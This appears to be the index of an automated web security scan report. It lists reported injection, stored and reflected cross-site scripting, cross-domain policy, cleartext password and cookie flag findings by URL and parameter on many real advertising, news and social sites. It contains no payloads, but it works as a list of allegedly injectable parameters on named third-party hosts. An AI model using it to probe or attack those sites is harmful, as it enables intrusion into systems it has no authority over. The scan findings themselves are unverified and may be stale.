1.1. http://d3fd89.r.axf8.net/mr/e.gif [a parameter]
1.2. http://ib.adnxs.com/getuidnb [Referer HTTP header]
3. Cross-site scripting (stored)
3.1. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]
3.2. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]
4.1. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]
4.2. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]
4.3. http://c7.zedo.com/utils/ecSet.js [v parameter]
4.4. http://tacoda.at.atwola.com/rtx/r.js [si parameter]
5. Cross-site scripting (reflected)
5.1. http://ad.turn.com/server/pixel.htm [fpid parameter]
5.2. http://ad.turn.com/server/pixel.htm [sp parameter]
5.3. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]
5.4. http://admeld.adnxs.com/usersync [admeld_callback parameter]
5.5. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [height parameter]
5.6. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [wcguid parameter]
5.7. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [width parameter]
5.8. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpt parameter]
5.9. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpvc parameter]
5.11. http://api.bit.ly/shorten [callback parameter]
5.12. http://api.bit.ly/shorten [longUrl parameter]
5.13. http://api.bizographics.com/v1/profile.redirect [api_key parameter]
5.14. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]
5.15. http://api.echoenabled.com/v1/search [q parameter]
5.16. http://b.scorecardresearch.com/beacon.js [c1 parameter]
5.17. http://b.scorecardresearch.com/beacon.js [c10 parameter]
5.18. http://b.scorecardresearch.com/beacon.js [c15 parameter]
5.19. http://b.scorecardresearch.com/beacon.js [c2 parameter]
5.20. http://b.scorecardresearch.com/beacon.js [c3 parameter]
5.21. http://b.scorecardresearch.com/beacon.js [c4 parameter]
5.22. http://b.scorecardresearch.com/beacon.js [c5 parameter]
5.23. http://b.scorecardresearch.com/beacon.js [c6 parameter]
5.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]
5.25. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]
5.27. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]
5.28. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]
5.29. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]
5.31. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]
5.32. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]
5.33. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]
5.34. http://control.adap.tv/control [as parameter]
5.35. http://control.adap.tv/control [categories parameter]
5.36. http://control.adap.tv/control [context parameter]
5.37. http://control.adap.tv/control [eov parameter]
5.38. http://control.adap.tv/control [height parameter]
5.39. http://control.adap.tv/control [htmlEnabled parameter]
5.40. http://control.adap.tv/control [isTop parameter]
5.41. http://control.adap.tv/control [keywords parameter]
5.42. http://control.adap.tv/control [name of an arbitrarily supplied request parameter]
5.43. http://control.adap.tv/control [pageUrl parameter]
5.44. http://control.adap.tv/control [sessionId parameter]
5.45. http://control.adap.tv/control [width parameter]
5.46. http://digg.com/submit [REST URL parameter 1]
5.47. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]
5.48. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
5.49. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
5.50. http://jlinks.industrybrains.com/jsct [ct parameter]
5.51. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
5.52. http://jlinks.industrybrains.com/jsct [tr parameter]
5.53. http://js.revsci.net/gateway/gw.js [csid parameter]
5.54. http://js.www.reuters.com/recommend/re/re [callback parameter]
5.55. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]
5.56. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]
5.57. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]
5.58. http://r.turn.com/server/pixel.htm [fpid parameter]
5.59. http://r.turn.com/server/pixel.htm [sp parameter]
5.60. http://rtq.careerbuilder.com/RTQ/jobstream.aspx [lr parameter]
5.61. http://rtq.careerbuilder.com/RTQ/jobstream.aspx [rssid parameter]
5.62. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]
5.63. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]
5.64. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]
5.65. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]
5.66. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard [mbox parameter]
5.67. http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter]
5.69. http://www.idg.com/www/rd.nsf/rd [REST URL parameter 1]
5.70. http://www.idg.com/www/rd.nsf/rd [REST URL parameter 3]
5.71. http://www.idg.com/www/rd.nsf/rd [name of an arbitrarily supplied request parameter]
5.72. http://www.linkedin.com/countserv/count/share [url parameter]
5.73. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [callback parameter]
5.74. http://www.reuters.com/assets/commentsChild [articleId parameter]
5.75. http://www.reuters.com/assets/commentsChild [channel parameter]
5.76. http://www.reuters.com/assets/searchIntercept [blob parameter]
5.77. http://www.reuters.com/tracker/guid [cb parameter]
5.78. https://www.sprint.net/ [name of an arbitrarily supplied request parameter]
5.79. https://www.sprint.net/external_videos/pages.php [REST URL parameter 1]
5.80. https://www.sprint.net/external_videos/pages.php [REST URL parameter 2]
5.81. https://www.sprint.net/index.php [REST URL parameter 1]
5.82. https://www.sprint.net/index.php [name of an arbitrarily supplied request parameter]
5.83. https://www.sprint.net/min/ [REST URL parameter 1]
5.84. http://www.und.com/allaccess/ [REST URL parameter 1]
5.85. http://www.und.com/favicon.ico [REST URL parameter 1]
5.86. http://www.und.com/gametracker/launch/ [REST URL parameter 1]
5.87. http://www.und.com/gametracker/launch/ [REST URL parameter 2]
5.88. http://www.und.com/nd.ico [REST URL parameter 1]
5.89. http://www.und.com/photogallery/ [REST URL parameter 1]
5.90. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1]
5.91. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2]
5.92. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3]
5.93. http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter]
5.94. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1]
5.95. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2]
5.96. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3]
5.97. http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter]
5.105. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 1]
5.106. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 2]
5.107. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 3]
5.108. http://www.careerbuilder.com/ [Referer HTTP header]
5.109. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx [Referer HTTP header]
5.110. http://www.careerbuilder.com/JobSeeker/Jobs/JobDetails.aspx [Referer HTTP header]
5.111. http://www.careerbuilder.com/JobSeeker/Jobs/JobQuery.aspx [Referer HTTP header]
5.113. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx [Referer HTTP header]
5.114. http://www.careerbuilder.com/PLI/R/JSToolkit.htm [Referer HTTP header]
5.115. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx [Referer HTTP header]
5.116. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx [Referer HTTP header]
5.117. http://www.sologig.com/ [Referer HTTP header]
5.118. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie]
5.119. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js [ruid cookie]
5.120. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js [ruid cookie]
5.121. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [xa cookie]
6.1. http://a.tribalfusion.com/crossdomain.xml
6.2. http://ad.afy11.net/crossdomain.xml
6.3. http://ad.doubleclick.net/crossdomain.xml
6.4. http://ad.turn.com/crossdomain.xml
6.5. http://admeld.adnxs.com/crossdomain.xml
6.6. http://admin.brightcove.com/crossdomain.xml
6.7. http://ads.undertone.com/crossdomain.xml
6.8. http://altfarm.mediaplex.com/crossdomain.xml
6.9. http://api.affinesystems.com/crossdomain.xml
6.10. http://api.bit.ly/crossdomain.xml
6.11. http://as.casalemedia.com/crossdomain.xml
6.12. http://audit.303br.net/crossdomain.xml
6.13. http://b.scorecardresearch.com/crossdomain.xml
6.14. http://bh.contextweb.com/crossdomain.xml
6.15. http://c.brightcove.com/crossdomain.xml
6.16. http://c5.zedo.com/crossdomain.xml
6.17. http://c7.zedo.com/crossdomain.xml
6.18. http://cdn.cinesport.com/crossdomain.xml
6.19. http://cdn.gigya.com/crossdomain.xml
6.20. http://cdn.taboolasyndication.com/crossdomain.xml
6.21. http://cdn.turn.com/crossdomain.xml
6.22. http://cdn.visiblemeasures.com/crossdomain.xml
6.23. https://cdns.gigya.com/crossdomain.xml
6.24. http://clk.fetchback.com/crossdomain.xml
6.25. http://companion.adap.tv/crossdomain.xml
6.26. http://control.adap.tv/crossdomain.xml
6.27. http://d3fd89.r.axf8.net/crossdomain.xml
6.28. http://external.ak.fbcdn.net/crossdomain.xml
6.29. http://findnsave.sacbee.com/crossdomain.xml
6.30. http://gannett.gcion.com/crossdomain.xml
6.31. http://goku.brightcove.com/crossdomain.xml
6.32. http://gscounters.gigya.com/crossdomain.xml
6.33. http://i.w55c.net/crossdomain.xml
6.34. http://ib.adnxs.com/crossdomain.xml
6.35. http://imp.fetchback.com/crossdomain.xml
6.36. http://init.lingospot.com/crossdomain.xml
6.37. http://js.revsci.net/crossdomain.xml
6.38. http://load.exelator.com/crossdomain.xml
6.39. http://load.tubemogul.com/crossdomain.xml
6.40. http://log.adap.tv/crossdomain.xml
6.41. http://metrics.sprint.com/crossdomain.xml
6.42. http://motifcdn2.doubleclick.net/crossdomain.xml
6.43. http://nmcharlotte.112.2o7.net/crossdomain.xml
6.44. http://odb.outbrain.com/crossdomain.xml
6.45. http://p.brilig.com/crossdomain.xml
6.46. http://paid.outbrain.com/crossdomain.xml
6.47. http://pbid.pro-market.net/crossdomain.xml
6.48. http://pix04.revsci.net/crossdomain.xml
6.49. http://pixel.invitemedia.com/crossdomain.xml
6.50. http://pixel.quantserve.com/crossdomain.xml
6.51. http://premium.mookie1.com/crossdomain.xml
6.52. http://qlog.adap.tv/crossdomain.xml
6.53. http://r.turn.com/crossdomain.xml
6.54. http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml
6.55. http://receive.inplay.tubemogul.com/crossdomain.xml
6.56. http://redir.adap.tv/crossdomain.xml
6.57. http://s0.2mdn.net/crossdomain.xml
6.58. http://s3.cinesport.com/crossdomain.xml
6.59. http://search.spotxchange.com/crossdomain.xml
6.60. http://secure-us.imrworldwide.com/crossdomain.xml
6.61. http://segments.adap.tv/crossdomain.xml
6.62. http://simg.zedo.com/crossdomain.xml
6.63. https://socialize.gigya.com/crossdomain.xml
6.64. http://sprint.tt.omtrdc.net/crossdomain.xml
6.65. http://statse.webtrendslive.com/crossdomain.xml
6.66. http://studio-5.financialcontent.com/crossdomain.xml
6.67. http://sync.adap.tv/crossdomain.xml
6.68. http://sync.mathtag.com/crossdomain.xml
6.69. http://sync.tidaltv.com/crossdomain.xml
6.70. http://tags.bluekai.com/crossdomain.xml
6.71. http://tcr.tynt.com/crossdomain.xml
6.72. http://traffic.outbrain.com/crossdomain.xml
6.73. http://trc.taboolasyndication.com/crossdomain.xml
6.74. http://usatoday1.112.2o7.net/crossdomain.xml
6.75. http://vast.ap919.btrll.com/crossdomain.xml
6.76. http://video.od.visiblemeasures.com/crossdomain.xml
6.77. http://wac.3a03.edgecastcdn.net/crossdomain.xml
6.78. http://www.goutsa.com/crossdomain.xml
6.79. http://www.wunderground.com/crossdomain.xml
6.80. http://www.zvents.com/crossdomain.xml
6.81. http://adadvisor.net/crossdomain.xml
6.82. http://charlotteobserver.adperfect.com/crossdomain.xml
6.83. http://cm.npc-mcclatchy.overture.com/crossdomain.xml
6.84. http://content.usatoday.com/crossdomain.xml
6.85. http://delivery.sprint.com/crossdomain.xml
6.86. http://developers.facebook.com/crossdomain.xml
6.87. http://disqus.com/crossdomain.xml
6.88. http://espn.go.com/crossdomain.xml
6.89. http://friendfeed.com/crossdomain.xml
6.90. http://googleads.g.doubleclick.net/crossdomain.xml
6.91. http://grfx.cstv.com/crossdomain.xml
6.92. http://ocp.ncaa.com/crossdomain.xml
6.93. http://onlyfans.cstv.com/crossdomain.xml
6.94. http://optimized-by.rubiconproject.com/crossdomain.xml
6.95. http://pagead2.googlesyndication.com/crossdomain.xml
6.96. http://picasaweb.google.com/crossdomain.xml
6.97. http://portfolio.us.reuters.com/crossdomain.xml
6.98. http://pubads.g.doubleclick.net/crossdomain.xml
6.99. http://rd.rlcdn.com/crossdomain.xml
6.100. http://rtq.careerbuilder.com/crossdomain.xml
6.101. http://search.charlotteobserver.com/crossdomain.xml
6.102. http://search2.sacbee.com/crossdomain.xml
6.103. http://snas.nbcuni.com/crossdomain.xml
6.104. http://static.ak.fbcdn.net/crossdomain.xml
6.105. http://syndication.mmismm.com/crossdomain.xml
6.106. http://www.careerbuilder.com/crossdomain.xml
6.107. http://www.cars.com/crossdomain.xml
6.108. http://www.charlotteobserver.com/crossdomain.xml
6.109. http://www.facebook.com/crossdomain.xml
6.110. http://www.fansonly.com/crossdomain.xml
6.111. http://www.foxsportssouthwest.com/crossdomain.xml
6.112. http://www.latimes.com/crossdomain.xml
6.113. http://www.myspace.com/crossdomain.xml
6.114. http://www.reuters.com/crossdomain.xml
6.115. http://www.sacbee.com/crossdomain.xml
6.116. http://www.sologig.com/crossdomain.xml
6.117. http://www.stumbleupon.com/crossdomain.xml
6.118. http://www.tsn.ca/crossdomain.xml
6.119. http://www.usatoday.com/crossdomain.xml
6.120. http://www.wtp101.com/crossdomain.xml
6.121. http://www.youtube.com/crossdomain.xml
6.122. http://admin6.testandtarget.omniture.com/crossdomain.xml
6.123. http://api.twitter.com/crossdomain.xml
6.124. https://docs.google.com/crossdomain.xml
6.125. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml
6.126. http://twitter.com/crossdomain.xml
6.127. http://www.traffic.com/crossdomain.xml
7. Silverlight cross-domain policy
7.1. http://ad.doubleclick.net/clientaccesspolicy.xml
7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml
7.3. http://content.usatoday.com/clientaccesspolicy.xml
7.4. http://metrics.sprint.com/clientaccesspolicy.xml
7.5. http://nmcharlotte.112.2o7.net/clientaccesspolicy.xml
7.6. http://pixel.quantserve.com/clientaccesspolicy.xml
7.7. http://s0.2mdn.net/clientaccesspolicy.xml
7.8. http://secure-us.imrworldwide.com/clientaccesspolicy.xml
7.9. http://usatoday1.112.2o7.net/clientaccesspolicy.xml
7.10. http://video.od.visiblemeasures.com/clientaccesspolicy.xml
7.11. http://www.goutsa.com/clientaccesspolicy.xml
7.12. http://www.tulsaworld.com/clientaccesspolicy.xml
7.13. http://www.usatoday.com/clientaccesspolicy.xml
8. Cleartext submission of password
8.3. http://www.ispsports.com/radio-network-affiliates.cfm
8.4. http://www.sacbee.com/reg-bin/int.cgi
8.5. http://www.sacbee.com/reg-bin/int.cgi
8.6. http://www.thatsracin.com/reg-bin/int.cgi
8.7. http://www.thatsracin.com/reg-bin/int.cgi
8.8. http://www.thatsracin.com/reg-bin/int.cgi
9. SSL cookie without secure flag set
10.1. http://charlotteobserver.adperfect.com/
10.2. http://control.adap.tv/control
10.3. http://feedburner.google.com/fb/a/mailverify
10.6. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard
10.7. http://www.facebook.com/extern/login_status.php
11.2. https://login.yahoo.com/
11.3. https://observ.subscribeobserver.com/
11.5. https://commerce.us.reuters.com/
11.6. https://docs.google.com/
11.7. https://mail.google.com/
11.8. https://maps-api-ssl.google.com/
11.9. https://sites.google.com/
11.10. https://socialize.gigya.com/
11.11. https://subscriberservices.mcclatchy.com/
11.12. https://www.linkedin.com/
11.13. https://www.sprint.net/
12. Password field submitted using GET method
13. Cookie scoped to parent domain
13.1. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json
13.2. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826
13.3. http://a.tribalfusion.com/j.ad
13.4. http://ad.doubleclick.net/jump/N763.no_url_specifiedOX2619/B5770010.3
13.5. http://ad.doubleclick.net/jump/N763.usatoday.comOX3622/B5770010.5
13.7. http://ad.turn.com/server/pixel.htm
13.8. http://ad.yabuka.com/statsin/adframe/803/300x250
13.9. http://admeld.adnxs.com/usersync
13.10. http://ads.revsci.net/adserver/ako
13.11. http://ads.revsci.net/adserver/ako
13.12. http://ads.revsci.net/adserver/ako
13.13. http://ads.revsci.net/adserver/ako
13.14. http://ads.undertone.com/ajs.php
13.15. http://ak1.abmr.net/is/ads.undertone.com
13.16. http://ak1.abmr.net/is/tag.admeld.com
13.17. http://api.bizographics.com/v1/profile.redirect
13.18. http://as.casalemedia.com/s
13.19. http://b.scorecardresearch.com/b
13.20. http://b.scorecardresearch.com/p
13.21. http://b.scorecardresearch.com/r
13.22. http://bh.contextweb.com/bh/rtset
13.23. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js
13.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js
13.25. http://c7.zedo.com/utils/ecSet.js
13.26. http://clk.fetchback.com/serve/fb/click
13.27. http://cm.npc-mcclatchy.overture.com/js_1_0/
13.28. http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js
13.29. http://companion.adap.tv/companion/post
13.30. http://control.adap.tv/control
13.31. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F
13.32. http://developers.facebook.com/plugins/
13.33. http://feedburner.google.com/fb/a/mailverify
13.34. http://i.w55c.net/ping_match.gif
13.35. http://ib.adnxs.com/getuid
13.36. http://ib.adnxs.com/getuidnb
13.37. http://imp.fetchback.com/serve/fb/adtag.js
13.38. http://imp.fetchback.com/serve/fb/imp
13.39. http://js.revsci.net/gateway/gw.js
13.40. http://leadback.advertising.com/adcedge/lb
13.41. http://load.exelator.com/load/
13.43. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516
13.44. http://odb.outbrain.com/utils/get
13.45. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js
13.46. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
13.47. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js
13.48. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js
13.49. http://p.brilig.com/contact/bct
13.50. http://picasaweb.google.com/lh/view
13.51. http://pix04.revsci.net/A11149/a4/0/0/123.302
13.52. http://pix04.revsci.net/D08734/a1/0/0/0.gif
13.53. http://pix04.revsci.net/D08734/a1/0/3/0.js
13.54. http://pix04.revsci.net/F09828/a4/0/0/0.js
13.55. http://pix04.revsci.net/I07714/b3/0/3/1008211/954068462.js
13.56. http://pix04.revsci.net/J06575/a4/0/0/pcx.js
13.57. http://pix04.revsci.net/J06575/b3/0/3/1008211/846374105.js
13.58. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif
13.59. http://pixel.rubiconproject.com/tap.php
13.60. http://pixel.rubiconproject.com/tap.php
13.61. http://pixel.rubiconproject.com/tap.php
13.62. http://pixel.rubiconproject.com/tap.php
13.64. http://r.turn.com/server/pixel.htm
13.65. http://rt.legolas-media.com/lgrt
13.66. http://segments.adap.tv/data
13.67. http://segments.adap.tv/data/
13.68. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif
13.69. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
13.70. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js
13.71. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js
13.72. http://sync.adap.tv/sync
13.73. http://sync.mathtag.com/sync/img
13.74. http://tacoda.at.atwola.com/rtx/r.js
13.75. http://tags.bluekai.com/site/2964
13.76. http://tags.bluekai.com/site/38
13.77. http://tags.bluekai.com/site/4449
13.78. http://tags.bluekai.com/site/450
13.79. http://tags.bluekai.com/site/4592
13.80. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
13.81. http://tu.connect.wunderloop.net/TU/1/1/1/
13.82. http://tu.connect.wunderloop.net/TU2/1/1/1/
13.83. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954
13.84. http://www.bizographics.com/collect/
13.85. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx
13.86. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx
13.87. http://www.facebook.com/campaign/landing.php
13.88. http://www.facebook.com/home.php
13.89. http://www.facebook.com/share.php
13.90. http://www.google.com/insights/search/
13.91. https://www.linkedin.com/secure/login
13.92. http://www.myspace.com/Modules/PostTo/Pages/
13.93. http://www.sacbee.com/reg_js/access_check.js
13.94. http://www.wtp101.com/pull_sync
13.95. http://www.youtube.com/results
14. Cookie without HttpOnly flag set
14.1. http://content.usatoday.com/quickquestion/jquery/1.0.1.html
14.2. http://findnsave.sacbee.com/api/aacoupons.json
14.3. http://findnsave.sacbee.com/api/groupon.json
14.4. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826
14.5. http://shop.sprint.com/mysprint/shop/phone_wall.jsp
14.6. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
14.7. http://trc.taboolasyndication.com/reuters/trc/2/json
14.8. http://www.cars.com/go/crp/index.jsp
14.9. https://www.linkedin.com/secure/login
14.10. http://www.traffic.com/Charlotte-Traffic/Charlotte-Traffic-Map.html
14.11. http://www.usatoday.com/community/profile.htm
14.12. http://www.usatoday.com/marketing/feedback.htm
14.13. http://www.usatoday.com/marketing/questions.htm
14.14. http://a.tribalfusion.com/j.ad
14.15. http://ad.360yield.com/match
14.16. http://ad.doubleclick.net/jump/N763.no_url_specifiedOX2619/B5770010.3
14.17. http://ad.doubleclick.net/jump/N763.usatoday.comOX3622/B5770010.5
14.18. http://ad.turn.com/r/cs
14.19. http://ad.turn.com/server/pixel.htm
14.20. http://ad.yabuka.com/statsin/adframe/803/300x250
14.21. http://ad.yieldmanager.com/pixel
14.22. http://ads.revsci.net/adserver/ako
14.23. http://ads.revsci.net/adserver/ako
14.24. http://ads.revsci.net/adserver/ako
14.25. http://ads.revsci.net/adserver/ako
14.26. http://ads.undertone.com/ajs.php
14.27. http://ads.undertone.com/fc.php
14.28. http://ads.undertone.com/l
14.29. http://ak1.abmr.net/is/ads.undertone.com
14.30. http://ak1.abmr.net/is/tag.admeld.com
14.31. http://api.bizographics.com/v1/profile.redirect
14.32. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json
14.33. http://ar.atwola.com/atd
14.34. http://as.casalemedia.com/s
14.35. http://b.scorecardresearch.com/b
14.36. http://b.scorecardresearch.com/p
14.37. http://b.scorecardresearch.com/r
14.38. http://bh.contextweb.com/bh/rtset
14.39. http://bookmarks.yahoo.com/myresults/bookmarklet
14.40. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js
14.41. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js
14.42. http://c7.zedo.com/utils/ecSet.js
14.43. http://c7.zedo.com/utils/ecSet.js
14.44. http://clk.fetchback.com/serve/fb/click
14.45. http://cm.npc-mcclatchy.overture.com/js_1_0/
14.46. http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js
14.47. http://companion.adap.tv/companion/post
14.48. http://control.adap.tv/control
14.49. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F
14.50. http://developers.facebook.com/plugins/
14.51. http://i.w55c.net/ping_match.gif
14.52. http://imp.fetchback.com/serve/fb/adtag.js
14.53. http://imp.fetchback.com/serve/fb/imp
14.54. http://js.revsci.net/gateway/gw.js
14.55. http://leadback.advertising.com/adcedge/lb
14.56. http://legolas.nexac.com/lgalt
14.57. http://load.exelator.com/load/
14.59. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516
14.60. http://odb.outbrain.com/utils/get
14.61. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js
14.62. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
14.63. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js
14.64. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js
14.65. http://p.brilig.com/contact/bct
14.66. http://pix04.revsci.net/A11149/a4/0/0/123.302
14.67. http://pix04.revsci.net/D08734/a1/0/0/0.gif
14.68. http://pix04.revsci.net/D08734/a1/0/3/0.js
14.69. http://pix04.revsci.net/F09828/a4/0/0/0.js
14.70. http://pix04.revsci.net/I07714/b3/0/3/1008211/954068462.js
14.71. http://pix04.revsci.net/J06575/a4/0/0/pcx.js
14.72. http://pix04.revsci.net/J06575/b3/0/3/1008211/846374105.js
14.73. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif
14.74. http://pixel.rubiconproject.com/tap.php
14.75. http://pixel.rubiconproject.com/tap.php
14.76. http://pixel.rubiconproject.com/tap.php
14.77. http://pixel.rubiconproject.com/tap.php
14.79. http://r.turn.com/server/pixel.htm
14.80. http://rt.legolas-media.com/lgrt
14.81. http://segments.adap.tv/data
14.82. http://segments.adap.tv/data/
14.83. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif
14.85. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png
14.86. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png
14.89. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif
14.90. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif
14.91. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg
14.92. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg
14.93. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png
14.94. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png
14.98. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif
14.99. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif
14.100. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif
14.101. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif
14.103. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif
14.104. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif
14.105. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif
14.106. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif
14.107. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif
14.108. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif
14.109. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif
14.110. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif
14.111. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif
14.112. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif
14.113. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif
14.114. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif
14.115. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js
14.116. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js
14.117. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js
14.118. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js
14.119. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js
14.120. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js
14.121. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/pluckApps.js
14.122. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif
14.123. http://sitelife.usatoday.com/ver1.0/content/ua/css/pluckAll.css
14.124. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
14.125. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js
14.126. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js
14.127. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard
14.128. http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif
